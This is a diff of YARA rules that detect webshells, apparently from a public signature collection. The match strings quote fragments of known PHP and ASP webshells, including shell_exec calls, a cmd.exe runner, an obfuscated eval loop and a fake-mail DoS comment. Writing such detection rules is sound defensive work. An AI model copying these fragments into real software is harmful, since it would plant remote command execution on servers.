 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4371-L4384"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5447-L5462"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b32d1730d23a660fd6aa8e60c3dc549f"
-		logic_hash = "969f0f12449375a9ebbb8a68fd4b3db395927416d5cceccdb7f2c64310430880"
+		logic_hash = "a5dc73a12d8c8b89bab77b90cb3b561e9daf9db5f5ad550326a2fbce52c1c8da"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash2 = "44542e5c3e9790815c49d5f9beffbbf2"
+		hash3 = "d089e7168373a0634e1ac18c0ee00085"
+		hash4 = "38fd7e45f9c11a37463c3ded1c76af4c"
 
 	strings:
-		$s0 = "if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & \"@\" & makeText(8) & \".\""
-		$s1 = "<form name=frmCMD method=post action=\"<%=gURL%>\">"
-		$s2 = "dim zombie_array,special_array"
-		$s3 = "http://vnhacker.org"
+		$s0 = "$result = mysql_query(\"SHOW PROCESSLIST\", $sql_sock); " fullword
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Indexer_Asp
+rule SIGNATURE_BASE_Multiple_Php_Webshells_2
 {
 	meta:
-		description = "Semi-Auto-generated  - file indexer.asp.txt"
+		description = "Semi-Auto-generated "
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "84ff60f9-36f7-5d29-9f38-8088fb42582e"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4385-L4396"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5463-L5483"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9ea82afb8c7070817d4cdf686abe0300"
-		logic_hash = "0a51f15bfb4289dcb70e1e0b96d100be12901ebf26ed9c0e543eda5f4aa91f1c"
+		logic_hash = "26fe586ba7f4d1931b2df81aa27543ff422e699fd56b6b1be289a0f8d6954691"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash5 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+		hash6 = "09609851caa129e40b0d56e90dfc476c"
+		hash7 = "671cad517edd254352fe7e0c7c981c39"
 
 	strings:
-		$s0 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ"
-		$s2 = "D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type=\"submit"
+		$s0 = "elseif (!empty($ft)) {echo \"<center><b>Manually selected type is incorrect. I"
+		$s1 = "else {echo \"<center><b>Unknown extension (\".$ext.\"), please, select type ma"
+		$s3 = "$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";" fullword
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Dxshell_Php_Php
+rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_1_Specialshell_99_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file DxShell.php.php.txt"
+		description = "Semi-Auto-generated "
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "b89930b7-acf3-5078-8429-d59e27e4b00c"
+		id = "4915146e-141c-5515-ac5a-61901d42dc40"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4397-L4408"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5484-L5502"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "33a2b31810178f4c2e71fbdeb4899244"
-		logic_hash = "821f9295eba6119ad08349e769d1909cd7836b4e35795915e94095cf715dc6e5"
+		logic_hash = "160adf93d4f9e51022c427b2b0601207dd9ca917e98d99e2013fe83e09a85d21"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "44542e5c3e9790815c49d5f9beffbbf2"
+		hash4 = "09609851caa129e40b0d56e90dfc476c"
 
 	strings:
-		$s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
-		$s2 = "print \"\\n\".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><"
+		$s0 = "if ($total === FALSE) {$total = 0;}" fullword
+		$s1 = "$free_percent = round(100/($total/$free),2);" fullword
+		$s2 = "if (!$bool) {$bool = is_dir($letter.\":\\\\\");}" fullword
+		$s3 = "$bool = $isdiskette = in_array($letter,$safemode_diskettes);" fullword
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_S72_Shell_V1_1_Coding_Html
+rule SIGNATURE_BASE__R577_Php_Php_R57_Php_Php_Spy_Php_Php_S_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file s72 Shell v1.1 Coding.html.txt"
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "dfd3b80e-6245-5f74-9d6a-6006218891ac"
+		id = "022d2255-50cd-500b-8d91-8e34f3c46fcf"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4409-L4421"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5503-L5519"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c2e8346a5515c81797af36e7e4a3828e"
-		logic_hash = "aef8840b72e5c435c11150007d6b3af2943126fefdc6df343d0f73755340e260"
+		logic_hash = "7ba3d6927dc06bfcd98ee9d7146164ca9a9024ef26eac60fabc8ed1375db618d"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		hash2 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash3 = "817671e1bdc85e04cc3440bbd9288800"
 
 	strings:
-		$s0 = "Dizin</font></b></font><font face=\"Verdana\" style=\"font-size: 8pt\"><"
-		$s1 = "s72 Shell v1.0 Codinf by Cr@zy_King"
-		$s3 = "echo \"<p align=center>Dosya Zaten Bulunuyor</p>\""
+		$s0 = "$res = mssql_query(\"select * from r57_temp_table\",$db);" fullword
+		$s2 = "'eng_text30'=>'Cat file'," fullword
+		$s3 = "@mssql_query(\"drop table r57_temp_table\",$db);" fullword
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Kacak_Asp
+rule SIGNATURE_BASE__Nixrem_Php_Php_C99Shell_V1_0_Php_Php_C99Php_NIX_REMOTE_WEB_SHELL_V_0_5_Alpha_Lite_Public_Version_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file kacak.asp.txt"
+		description = "Semi-Auto-generated "
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "1ae15174-b84a-5826-b768-7afed65196db"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4422-L4435"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5520-L5537"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "907d95d46785db21331a0324972dda8c"
-		logic_hash = "8542a3985dff2d1eb42f4d2c9f30405a4817a8e30075225c518ec52381f1f7df"
+		logic_hash = "f7575db2c8f147d03d5b93b431d1a73c4182b5db6e801e672914778b2042a712"
 		score = 75
 		quality = 85
 		tags = ""
+		super_rule = 1
+		hash0 = "40a3e86a63d3d7f063a86aab5b5f92c6"
+		hash1 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash2 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash3 = "f3ca29b7999643507081caab926e2e74"
 
 	strings:
-		$s0 = "Kacak FSO 1.0"
-		$s1 = "if request.querystring(\"TGH\") = \"1\" then"
-		$s3 = "<font color=\"#858585\">BuqX</font></a></font><font face=\"Verdana\" style="
-		$s4 = "mailto:BuqX@hotmail.com"
+		$s0 = "$num = $nixpasswd + $nixpwdperpage;" fullword
+		$s1 = "$ret = posix_kill($pid,$sig);" fullword
+		$s2 = "if ($uid) {echo join(\":\",$uid).\"<br>\";}" fullword
+		$s3 = "$i = $nixpasswd;" fullword
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_PHP_Backdoor_Connect_Pl_Php
+rule SIGNATURE_BASE_Darksecurityteam_Webshell
 {
 	meta:
-		description = "Semi-Auto-generated  - file PHP Backdoor Connect.pl.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "96c9258e-3894-5ee9-b52c-eb7ba7454416"
+		description = "Dark Security Team Webshell"
+		author = "Florian Roth (Nextron Systems)"
+		id = "78dcd62f-9215-5571-a5ef-5f811ce9672f"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4436-L4448"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5541-L5553"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "57fcd9560dac244aeaf95fd606621900"
-		logic_hash = "b141546f45767884f9c8b1cc4c09ea25f90c0f3a3633bfeecad78b60e7f20306"
-		score = 75
+		hash = "f1c95b13a71ca3629a0bb79601fcacf57cdfcf768806a71b26f2448f8c1d5d24"
+		logic_hash = "0c58ed8845cb04d785322b280647d424e1028a3be7e92b2493fd907fae36b16d"
+		score = 50
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "LorD of IRAN HACKERS SABOTAGE"
-		$s1 = "LorD-C0d3r-NT"
-		$s2 = "echo --==Userinfo==-- ;"
+		$s0 = "form method=post><input type=hidden name=\"\"#\"\" value=Execute(Session(\"\"#\"\"))><input name=thePath value=\"\"\"&HtmlEncode(Server.MapPath(\".\"))&" ascii
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Antichat_Socks5_Server_Php_Php
+rule SIGNATURE_BASE_PHP_Cloaked_Webshell_Superfetchexec
 {
 	meta:
-		description = "Semi-Auto-generated  - file Antichat Socks5 Server.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "35d0930c-ef07-5fd4-9d7a-c0d685f92339"
+		description = "Looks like a webshell cloaked as GIF - http://goo.gl/xFvioC"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4611129a-9865-5603-b1ec-7db0058a80d7"
 		date = "2025-03-29"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4449-L4461"
+		reference = "http://goo.gl/xFvioC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5555-L5567"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cbe9eafbc4d86842a61a54d98e5b61f1"
-		logic_hash = "d6b203561f95f431b3d2c241011ae08c05619d45c5900a28137481c029e8297e"
-		score = 75
+		logic_hash = "320b85b1ad39a90578f53c69838b6264af1e6a71c509aefc0986c7f0c77fdae9"
+		score = 50
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);" fullword
-		$s3 = "#   [+] Domain name address type"
-		$s4 = "www.antichat.ru"
+		$s0 = "else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);"
 
 	condition:
-		1 of them
+		$s0
 }
-rule SIGNATURE_BASE_Antichat_Shell_V1_3_Php
+rule SIGNATURE_BASE_Webshell_Remexp_Asp_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file Antichat Shell v1.3.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "856cf977-24da-58e0-b6d2-820c92075ecc"
+		description = "PHP Webshells Github Archive - file RemExp.asp.php.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "274c8816-2711-5f12-937e-549ec2d57ce1"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4462-L4474"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5571-L5586"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "40d0abceba125868be7f3f990f031521"
-		logic_hash = "566c324f3bf44ce9f32ddad82a8d3daa87a8a75b5ca0c8286bc912a8ae4ac8e9"
+		hash = "d9919dcf94a70d5180650de8b81669fa1c10c5a2"
+		logic_hash = "b3cfa44898629ffa20630436ae10a94ad72f0e793d61e1157a4de649aa048fe2"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Antichat"
-		$s1 = "Can't open file, permission denide"
-		$s2 = "$ra44"
+		$s0 = "lsExt = Right(FileName, Len(FileName) - liCount)" fullword
+		$s7 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f"
+		$s13 = "Response.Write Drive.ShareName & \" [share]\"" fullword
+		$s19 = "If Request.QueryString(\"CopyFile\") <> \"\" Then" fullword
+		$s20 = "<td width=\"40%\" height=\"20\" bgcolor=\"silver\">  Name</td>" fullword
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Safe_Mode_Bypass_PHP_4_4_2_And_PHP_5_1_2_Php
+rule SIGNATURE_BASE_Webshell_Dc3_Security_Crew_Shell_Priv
 {
 	meta:
-		description = "Semi-Auto-generated  - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "3e81f628-31b4-5c22-943e-62c8cb4c0c4d"
+		description = "PHP Webshells Github Archive - file dC3_Security_Crew_Shell_PRiV.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c83bb4ba-6b4e-5a88-925b-b93d08b304e4"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4475-L4487"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5587-L5603"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "49ad9117c96419c35987aaa7e2230f63"
-		logic_hash = "d6d2a3999f2e8ceb70f57697c0a845edbbcfce0aba151ec6a0ac23f55265cd47"
+		hash = "1b2a4a7174ca170b4e3a8cdf4814c92695134c8a"
+		logic_hash = "f93a5d87d4a490844de578067dc0b7bac6b01ceb9130cd7c70a227566e18f16c"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy"
-		$s1 = "Mode Shell v1.0</font></span>"
-		$s2 = "has been already loaded. PHP Emperor <xb5@hotmail."
+		$s0 = "@rmdir($_GET['file']) or die (\"[-]Error deleting dir!\");" fullword
+		$s4 = "$ps=str_replace(\"\\\\\",\"/\",getenv('DOCUMENT_ROOT'));" fullword
+		$s5 = "header(\"Expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));" fullword
+		$s15 = "search_file($_POST['search'],urldecode($_POST['dir']));" fullword
+		$s16 = "echo base64_decode($images[$_GET['pic']]);" fullword
+		$s20 = "if (isset($_GET['rename_all'])) {" fullword
 
 	condition:
-		1 of them
+		3 of them
 }
-rule SIGNATURE_BASE_Mysql_Php_Php
+rule SIGNATURE_BASE_Webshell_Simattacker
 {
 	meta:
-		description = "Semi-Auto-generated  - file mysql.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "41730336-0dce-5ed9-95b0-c911a4e3cb48"
+		description = "PHP Webshells Github Archive - file simattacker.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2408fad8-780f-50de-a309-99d14a1d87b6"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4488-L4500"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5604-L5622"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "12bbdf6ef403720442a47a3cc730d034"
-		logic_hash = "60e235310f378698ffcc3ae6a07ab5dd94a660ca4b1504cc878d9741f751d5d1"
+		hash = "258297b62aeaf4650ce04642ad5f19be25ec29c9"
+		logic_hash = "323b68f1d31df647775ad16a85b9f90bce4eac89188160a1e4853f8fec680160"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "action=mysqlread&mass=loadmass\">load all defaults"
-		$s2 = "if (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthru"
-		$s3 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = "
+		$s1 = "$from = rand (71,1020000000).\"@\".\"Attacker.com\";" fullword
+		$s4 = "&nbsp;Turkish Hackers : WWW.ALTURKS.COM <br>" fullword
+		$s5 = "&nbsp;Programer : SimAttacker - Edited By KingDefacer<br>" fullword
+		$s6 = "//fake mail = Use victim server 4 DOS - fake mail " fullword
+		$s10 = "&nbsp;e-mail : kingdefacer@msn.com<br>" fullword
+		$s17 = "error_reporting(E_ERROR | E_WARNING | E_PARSE);" fullword
+		$s18 = "echo \"<font size='1' color='#999999'>Dont in windows\";" fullword
+		$s20 = "$Comments=$_POST['Comments'];" fullword
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Worse_Linux_Shell_Php
+rule SIGNATURE_BASE_Webshell_Dtool_Pro
 {
 	meta:
-		description = "Semi-Auto-generated  - file Worse Linux Shell.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "e223e2a9-7c7a-597a-8b90-a63ee11805ea"
+		description = "PHP Webshells Github Archive - file DTool Pro.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9f2922d1-b2af-58ae-b194-ecb33577effa"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4501-L4512"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5623-L5641"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8338c8d9eab10bd38a7116eb534b5fa2"
-		logic_hash = "47801296b700e85f9e08857eb06f845ef8ed3f88b7d0de34d4b7c47cef6cc7fb"
+		hash = "e2ee1c7ba7b05994f65710b7bbf935954f2c3353"
+		logic_hash = "da744efb521415fb8817c0982d8d538e1e38b1c0995f43716611df37bf371c38"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "print \"<tr><td><b>Server is:</b></td><td>\".$_SERVER['SERVER_SIGNATURE'].\"</td"
-		$s2 = "print \"<tr><td><b>Execute command:</b></td><td><input size=100 name=\\\"_cmd"
+		$s1 = "function PHPget(){inclVar(); if(confirm(\"O PHPget agora oferece uma lista pront"
+		$s2 = "<font size=3>by r3v3ng4ns - revengans@gmail.com </font>" fullword
+		$s3 = "function PHPwriter(){inclVar();var url=prompt(\"[ PHPwriter ] by r3v3ng4ns\\nDig"
+		$s11 = "//Turns the 'ls' command more usefull, showing it as it looks in the shell" fullword
+		$s13 = "if (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";" fullword
+		$s14 = "//To keep the changes in the url, when using the 'GET' way to send php variables" fullword
+		$s16 = "function PHPf(){inclVar();var o=prompt(\"[ PHPfilEditor ] by r3v3ng4ns\\nDigite "
+		$s18 = "if(empty($fu)) $fu = @$_GET['fu'];" fullword
 
 	condition:
-		1 of them
+		3 of them
 }
-rule SIGNATURE_BASE_Cyberlords_Sql_Php_Php
+rule SIGNATURE_BASE_Webshell_Ironshell_4
 {
 	meta:
-		description = "Semi-Auto-generated  - file cyberlords_sql.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "41730336-0dce-5ed9-95b0-c911a4e3cb48"
+		description = "PHP Webshells Github Archive - file ironshell.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "06e87e02-372b-5d4e-be52-5515a068665b"
 		date = "2025-03-29"
 		modified = "2025-03-29"
+		old_rule_name = "WebShell_ironshell"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4513-L4526"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5642-L5661"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "03b06b4183cb9947ccda2c3d636406d4"
-		logic_hash = "b3286f9fd86c90c5afc79801b6d65c9ae52ee1c37da93ff15461d84f37ef8019"
+		hash = "d47b8ba98ea8061404defc6b3a30839c4444a262"
+		logic_hash = "1810071f261ad7390532b07ef24115726f236131aa8ffd29adbde9ebe5085e9d"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Coded by n0 [nZer0]"
-		$s1 = " www.cyberlords.net"
-		$s2 = "U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAACJoURkAAAAE"
-		$s3 = "return \"<BR>Dump error! Can't write to \".htmlspecialchars($file);"
+		$s0 = "<title>'.getenv(\"HTTP_HOST\").' ~ Shell I</title>" fullword
+		$s2 = "$link = mysql_connect($_POST['host'], $_POST['username'], $_POST"
+		$s4 = "error_reporting(0); //If there is an error, we'll show it, k?" fullword
+		$s8 = "print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&d"
+		$s15 = "if(!is_numeric($_POST['timelimit']))" fullword
+		$s16 = "if($_POST['chars'] == \"9999\")" fullword
+		$s17 = "<option value=\\\"az\\\">a - zzzzz</option>" fullword
+		$s18 = "print shell_exec($command);" fullword
 
 	condition:
-		1 of them
+		3 of them
 }
-rule SIGNATURE_BASE_Cmd_Asp_5_1_Asp
+rule SIGNATURE_BASE_Webshell_Indexer_Asp_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file cmd-asp-5.1.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "fc204ab8-892d-5435-a737-a185ca32e938"
+		description = "PHP Webshells Github Archive - file indexer.asp.php.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d6e17429-1b58-5a1b-846d-f5dbfd74cf3a"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4527-L4538"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5662-L5678"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8baa99666bf3734cbdfdd10088e0cd9f"
-		logic_hash = "a41c83da1a65e67b6f4ac6ad7cc8702486957ab0c7dda658d071e603338c324b"
+		hash = "e9a7aa5eb1fb228117dc85298c7d3ecd8e288a2d"
+		logic_hash = "c576925c95b5bd2549e8039a1fc6ac228bfab5ddee8c4e12264ea78e9828ba5c"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Call oS.Run(\"win.com cmd.exe /c del \"& szTF,0,True)" fullword
-		$s3 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword
+		$s0 = "<meta http-equiv=\"Content-Language\" content=\"tr\">" fullword
+		$s1 = "<title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>" fullword
+		$s2 = "<form action=\"?Gonder\" method=\"post\">" fullword
+		$s4 = "<form action=\"?oku\" method=\"post\">" fullword
+		$s7 = "var message=\"SaNaLTeRoR - " fullword
+		$s8 = "nDexEr - Reader\"" fullword
 
 	condition:
-		1 of them
+		3 of them
 }
-rule SIGNATURE_BASE_Pws_Php_Php
+rule SIGNATURE_BASE_Webshell_Toolaspshell
 {
 	meta:
-		description = "Semi-Auto-generated  - file pws.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "1ec47c33-dbec-50bd-b4b0-8f00b704a816"
+		description = "PHP Webshells Github Archive - file toolaspshell.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "016af030-4991-583c-aab5-a2933ae0eeec"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4539-L4551"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5679-L5692"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ecdc6c20f62f99fa265ec9257b7bf2ce"
-		logic_hash = "98dae8aab5bfd58f4264e318f5a5b5900b38687386f9d7f09c31da0f51d57bc0"
+		hash = "11d236b0d1c2da30828ffd2f393dd4c6a1022e3f"
+		logic_hash = "cb46d3170a9c144a22ef8c91b381495a471d2aa178a4a123eb9a1e32e1db7683"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
